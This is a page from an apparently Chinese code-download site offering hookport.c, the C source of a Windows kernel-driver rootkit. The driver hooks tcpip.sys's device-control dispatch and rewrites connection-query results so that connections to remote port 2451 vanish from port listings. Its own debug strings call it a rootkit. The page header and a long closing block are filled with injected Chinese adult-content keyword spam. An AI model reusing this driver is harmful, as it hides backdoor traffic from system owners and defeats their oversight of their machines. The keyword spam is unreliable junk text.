亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? hookport.c

?? 驅動類 rootkit 修改端口顯示
?? C
字號:
/*/////////////////////////////////////////
同過HOOK TCPIP.SYS的IRPS處理函數來隱藏端口
隱藏的端口號2451(遠端端口)
ineverland@163.com
/*////////////////////////////////////////


#include "ntddk.h"
#include "tdiinfo.h"

typedef BOOLEAN BOOL;
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
typedef unsigned long ULONG;
typedef unsigned short WORD;
typedef unsigned char BYTE;
typedef BYTE * LPBYTE;

#define IOCTL_TCP_QUERY_INFORMATION_EX 0x00120003

#define HTONS(a)  (((0xFF&a)<<8) + ((0xFF00&a)>>8))
/*/////////////////////////////////////////////////
請求類型不一樣返回的數據結構也會不同

/*//////////////////////////////////////////////////
typedef struct _CONNINFO101 {
   unsigned long status; 
   unsigned long src_addr; 
   unsigned short src_port; 
   unsigned short unk1; 
   unsigned long dst_addr; 
   unsigned short dst_port; 
   unsigned short unk2; 
} CONNINFO101, *PCONNINFO101;

typedef struct _CONNINFO102 {
   unsigned long status; 
   unsigned long src_addr; 
   unsigned short src_port; 
   unsigned short unk1; 
   unsigned long dst_addr; 
   unsigned short dst_port; 
   unsigned short unk2; 
   unsigned long pid;
} CONNINFO102, *PCONNINFO102;

typedef struct _CONNINFO110 {
   unsigned long size;
   unsigned long status; 
   unsigned long src_addr; 
   unsigned short src_port; 
   unsigned short unk1; 
   unsigned long dst_addr; 
   unsigned short dst_port; 
   unsigned short unk2; 
   unsigned long pid;
   PVOID    unk3[35];
} CONNINFO110, *PCONNINFO110;

typedef struct _REQINFO {
	PIO_COMPLETION_ROUTINE OldCompletion;
	unsigned long          ReqType;
} REQINFO, *PREQINFO;

PFILE_OBJECT pFile_tcp;
PDEVICE_OBJECT pDev_tcp;
PDRIVER_OBJECT pDrv_tcpip;

typedef NTSTATUS (*OLDIRPMJDEVICECONTROL)(IN PDEVICE_OBJECT, IN PIRP);
OLDIRPMJDEVICECONTROL OldIrpMjDeviceControl;

NTSTATUS RootkitUnload(IN PDRIVER_OBJECT);
NTSTATUS InstallTCPDriverHook();
NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT, IN PIRP);

NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT, IN PIRP, IN PVOID);








///////////////////////////////////////////////////////////////////////////////////////





   
NTSTATUS DriverEntry(
				   IN PDRIVER_OBJECT  DriverObject,
				   IN PUNICODE_STRING RegistryPath
					)
{
	
    NTSTATUS                ntStatus;
    DbgPrint("rootkit loaded!\n");
	OldIrpMjDeviceControl = NULL;

    DriverObject->DriverUnload = RootkitUnload;
	ntStatus = InstallTCPDriverHook();
	if(!NT_SUCCESS(ntStatus)) 
		return ntStatus;

	return STATUS_SUCCESS;
}


NTSTATUS InstallTCPDriverHook()//安裝Hook的函數
{
    NTSTATUS       ntStatus;
       
	UNICODE_STRING deviceTCPUnicodeString;
	WCHAR deviceTCPNameBuffer[]  = L"\\Device\\Tcp"; ///通過該設備來找到tcpip.sys驅動對象
    pFile_tcp  = NULL;
	pDev_tcp   = NULL;
	pDrv_tcpip = NULL;

	RtlInitUnicodeString (&deviceTCPUnicodeString, deviceTCPNameBuffer);
	ntStatus = IoGetDeviceObjectPointer(&deviceTCPUnicodeString, FILE_READ_DATA, &pFile_tcp, &pDev_tcp);
	if(!NT_SUCCESS(ntStatus)) 
		return ntStatus;
	pDrv_tcpip = pDev_tcp->DriverObject;

	OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL]; 
	if (OldIrpMjDeviceControl)
		InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)HookedDeviceControl);
	
	return STATUS_SUCCESS;
}


NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp) //查找枚舉端口號的IRP請求 并添加iocompleteroutine
{
    PIO_STACK_LOCATION      irpStack;
    ULONG                   ioTransferType;
	TDIObjectID             *inputBuffer;
	DWORD					context;


    irpStack = IoGetCurrentIrpStackLocation (Irp);

    switch (irpStack->MajorFunction) 
	{
	    case IRP_MJ_DEVICE_CONTROL:
			if ((irpStack->MinorFunction == 0) && \
				(irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX))
			{
				ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;
				ioTransferType &= 3;
				if (ioTransferType == METHOD_NEITHER) 
				{
					inputBuffer = (TDIObjectID *) irpStack->Parameters.DeviceIoControl.Type3InputBuffer;
					
				
					if (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY)
					{ 
						  DbgPrint("Input buffer %x\n",inputBuffer);
						if ((inputBuffer->toi_id == 0x101) || (inputBuffer->toi_id == 0x102) || (inputBuffer->toi_id == 0x110))
						{
						
							irpStack->Control = 0;
							irpStack->Control |= SL_INVOKE_ON_SUCCESS; 

							
							irpStack->Context = (PIO_COMPLETION_ROUTINE) ExAllocatePool(NonPagedPool, sizeof(REQINFO)); //在無分頁內存池里分配存放參數的空間

							((PREQINFO)irpStack->Context)->OldCompletion = irpStack->CompletionRoutine; 
							((PREQINFO)irpStack->Context)->ReqType       = inputBuffer->toi_id;

					
							irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine;
						}
					}
				}
			}
		break;
		
		default:
		break;
    }

    return OldIrpMjDeviceControl(DeviceObject, Irp);
}


NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject, 
							 IN PIRP Irp, 
							 IN PVOID Context)
{
	PVOID OutputBuffer;
    DWORD NumOutputBuffers;
	PIO_COMPLETION_ROUTINE p_compRoutine;
	DWORD i;

	// Connection status values:
	// 0 = Invisible
	// 1 = CLOSED
	// 2 = LISTENING
	// 3 = SYN_SENT
	// 4 = SYN_RECEIVED
	// 5 = ESTABLISHED
	// 6 = FIN_WAIT_1
	// 7 = FIN_WAIT_2
	// 8 = CLOSE_WAIT
	// 9 = CLOSING
	// ...

	OutputBuffer = Irp->UserBuffer;
	p_compRoutine = ((PREQINFO)Context)->OldCompletion;

	if (((PREQINFO)Context)->ReqType == 0x101)
	{
		NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);
		for(i = 0; i < NumOutputBuffers; i++)
		{

			if (HTONS(((PCONNINFO101)OutputBuffer)[i].dst_port) == 2451) //隱藏的端口為 2451
				((PCONNINFO101)OutputBuffer)[i].status = 0;
		}
	}
	else if (((PREQINFO)Context)->ReqType == 0x102)
	{
		NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);
		for(i = 0; i < NumOutputBuffers; i++)
		{

			if (HTONS(((PCONNINFO102)OutputBuffer)[i].dst_port) == 2451)
				((PCONNINFO102)OutputBuffer)[i].status = 0;
		}
	}
	else if (((PREQINFO)Context)->ReqType == 0x110)
	{
		NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);
		for(i = 0; i < NumOutputBuffers; i++)
		{

			if (HTONS(((PCONNINFO110)OutputBuffer)[i].dst_port) == 2451)
				((PCONNINFO110)OutputBuffer)[i].status = 0;
		}
	}

	ExFreePool(Context);


	if ((Irp->StackCount > (ULONG)1) && (p_compRoutine != NULL))
	{
		return (p_compRoutine)(DeviceObject, Irp, NULL);
	}
	else
	{
		return Irp->IoStatus.Status;
	}
}


NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
{
	DbgPrint("rootkit unload!\n");
	if (OldIrpMjDeviceControl)
		InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)OldIrpMjDeviceControl);	
	if (pFile_tcp != NULL)
		ObDereferenceObject(pFile_tcp);
	pFile_tcp = NULL;

	return STATUS_SUCCESS;
}

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
亚洲欧洲性图库| 成人污污视频在线观看| 国产福利精品一区二区| 日本高清无吗v一区| 久久精品视频免费观看| 五月婷婷综合网| 欧洲一区在线观看| 国产精品超碰97尤物18| 麻豆国产精品官网| 欧美人狂配大交3d怪物一区| 中文字幕日本不卡| 国产乱理伦片在线观看夜一区| 欧美精品一二三四| 亚洲激情第一区| 成人妖精视频yjsp地址| 精品精品国产高清a毛片牛牛| 肉色丝袜一区二区| 91官网在线观看| 国产精品免费av| 国产精品白丝jk黑袜喷水| 日韩欧美国产综合在线一区二区三区| 成人欧美一区二区三区1314| 高清日韩电视剧大全免费| 精品国产免费人成电影在线观看四季| 丝袜美腿亚洲一区| 91精品国产综合久久久久久漫画| 亚洲综合色噜噜狠狠| 色av成人天堂桃色av| 亚洲色图20p| 色欧美片视频在线观看| 亚洲欧美色一区| 99国产精品久| 亚洲精品久久嫩草网站秘色| 成人国产精品免费观看动漫| 国产精品午夜久久| 成人h动漫精品一区二区| 国产午夜精品一区二区三区四区| 国产一区二区成人久久免费影院 | 一本久道久久综合中文字幕| 亚洲三级在线播放| 91丨porny丨首页| 亚洲人成人一区二区在线观看| 91麻豆免费观看| 一级特黄大欧美久久久| 欧美亚洲图片小说| 日韩av在线播放中文字幕| 91精品国产福利| 国产美女视频91| 中文字幕不卡一区| 91久久精品一区二区| 日韩高清一区在线| 亚洲一区二区偷拍精品| 欧美久久久久久久久| 久久国内精品视频| av成人动漫在线观看| 亚洲人成在线观看一区二区| 日本午夜精品视频在线观看| 欧美三级电影在线看| 视频一区国产视频| 日韩一卡二卡三卡四卡| 激情综合网天天干| 国产精品久久久久久久岛一牛影视 | 中文字幕国产精品一区二区| 91在线无精精品入口| 亚洲国产精品久久一线不卡| 日韩午夜小视频| 白白色 亚洲乱淫| 亚洲成人av一区二区三区| 精品国产sm最大网站免费看| 波多野结衣一区二区三区 | 亚洲人成小说网站色在线 | 久久亚洲欧美国产精品乐播| 91影院在线免费观看| 日韩精品欧美精品| 亚洲欧美国产77777| 91精品国产一区二区三区香蕉| 国产黄色91视频| 亚洲最大色网站| 久久久亚洲欧洲日产国码αv| 色诱视频网站一区| 精品一区二区三区在线播放| 亚洲黄色av一区| 2017欧美狠狠色| 精品1区2区3区| 成人黄页在线观看| 激情欧美一区二区三区在线观看| 亚洲免费在线播放| 国产蜜臀av在线一区二区三区| 色久综合一二码| 成人av免费在线| 国产麻豆精品theporn| 午夜精品一区二区三区三上悠亚| 亚洲国产精品成人综合| 欧美精品一区二| 日韩美女一区二区三区四区| 欧美午夜精品久久久| 91视视频在线观看入口直接观看www | 亚洲裸体xxx| 国产日韩欧美一区二区三区综合| 欧美精选在线播放| 欧美午夜寂寞影院| 在线国产电影不卡| 91在线观看美女| aaa亚洲精品| 91丝袜国产在线播放| 成人一区二区三区视频| 国产91富婆露脸刺激对白| 狠狠狠色丁香婷婷综合久久五月| 免费观看一级特黄欧美大片| 日本中文字幕一区二区有限公司| 一区二区三区四区在线| 亚洲乱码中文字幕综合| 亚洲美女一区二区三区| 亚洲欧美日韩一区| 亚洲色图欧洲色图婷婷| 综合在线观看色| 亚洲精品亚洲人成人网| 夜色激情一区二区| 亚洲成av人**亚洲成av**| 亚洲超丰满肉感bbw| 日韩精品一二区| 蜜桃视频一区二区三区在线观看| 五月天中文字幕一区二区| 日韩av不卡在线观看| 欧美a级理论片| 精品一区二区三区在线播放| 国产精品自在欧美一区| 成人app软件下载大全免费| 91一区二区三区在线观看| 欧洲视频一区二区| 日韩午夜激情av| 久久久国产午夜精品| 最新国产の精品合集bt伙计| 亚洲三级免费电影| 亚洲sss视频在线视频| 欧美bbbbb| 成人国产精品免费| 欧美日韩午夜影院| 久久亚洲一区二区三区四区| 国产精品久久久久久福利一牛影视| 一区二区三区在线播| 日韩av一区二区在线影视| 国产精品羞羞答答xxdd| 色天天综合色天天久久| 欧美日韩国产美女| 亚洲国产精品传媒在线观看| 一区二区高清免费观看影视大全 | 国产成人aaa| 在线观看日韩高清av| 精品国产伦一区二区三区观看方式| 国产人成一区二区三区影院| 亚洲精品视频一区二区| 蜜臀久久99精品久久久久久9| 高清视频一区二区| 欧美日韩国产一级二级| 久久精品一区二区| 亚洲福利视频导航| 成人深夜福利app| 91精品国产91久久久久久一区二区| 欧美激情一区二区三区全黄| 亚洲va欧美va天堂v国产综合| 国产精品888| 7777精品伊人久久久大香线蕉的 | 国产精品你懂的在线| 亚洲福利视频一区二区| 成人美女视频在线观看18| 91精品国产综合久久久久| 国产精品毛片久久久久久| 麻豆精品国产91久久久久久| 91国内精品野花午夜精品| 久久综合久久综合久久综合| 一区二区三区四区亚洲| 不卡视频在线观看| 久久精品一区八戒影视| 捆绑调教一区二区三区| 欧美在线观看视频在线| 一区在线观看免费| 懂色av一区二区三区蜜臀| 日韩精品一区二区三区视频播放 | 日韩欧美中文字幕制服| 亚洲已满18点击进入久久| 国产麻豆精品在线| 日韩免费视频线观看| 亚洲成人三级小说| 91国在线观看| 精品成a人在线观看| 亚洲国产aⅴ天堂久久| 成人激情小说网站| 亚洲精品在线免费观看视频| 蜜臀久久99精品久久久久宅男| 91成人免费网站| 亚洲综合免费观看高清在线观看| 99精品一区二区| 国产精品美女视频| 成人免费观看视频| 国产精品丝袜黑色高跟| 国产成人精品午夜视频免费| 久久婷婷成人综合色| 国产精品18久久久久| 国产亚洲成aⅴ人片在线观看|